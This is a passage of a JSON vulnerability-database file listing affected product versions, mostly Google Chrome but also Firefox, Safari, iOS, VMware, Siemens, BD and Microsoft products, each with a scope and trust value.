0.3, "vendor": "google", "version": "24.0.1312.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.826.0" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.581.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "focal point solaris", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "-0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.544.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.130" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1041" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.336.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.11" }, { "model": "simatic s7-1518-4 pn/dp odk", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "52.0.2743.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.922.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.42" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "41.0.2272.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.910.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1686.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "simatic ipc427d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.671.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "50.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.424.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.39" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.6" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.898.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.478.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.540.0" }, { "model": "facspresto", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.57" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.46" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.5" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1004.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.136" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.821.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.492.0" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.33" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "42.0.2311" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.16" }, { "model": "windows for 32-bit systems sp1", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.41" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.948.0" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.74" }, { "model": "enterprise linux for ibm z systems extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.63" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "16.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.114" }, { "model": "pyxis duostation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1024.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.784.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "windows server for 32-bit systems sp2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.683.0" }, { "model": "kernel", "scope": "eq", "trust": 0.3, "vendor": "linux", "version": "4.9.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.425.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.486.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "35.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.747.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.333" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.2" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.1" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1017090" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.27" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.32" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1028" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.33" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.773.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.26" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.157" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.739.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.19" }, { "model": "influx", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.27" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491059" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.159.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1028.0" }, { "model": "chrome os", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "65.0.3325.167" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.95" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1013" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.159" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.44" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "9.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.24" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.660.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "57.0.2987.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.16" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.321.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "39.0.2171.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.48" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.861.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.524.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.717.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.9" }, { "model": "sql server r2 for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200830" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.880.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.607.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.471.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.1" }, { "model": "simatic ipc477d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "37.0.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.89" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.232" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.778.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.655.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.579.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 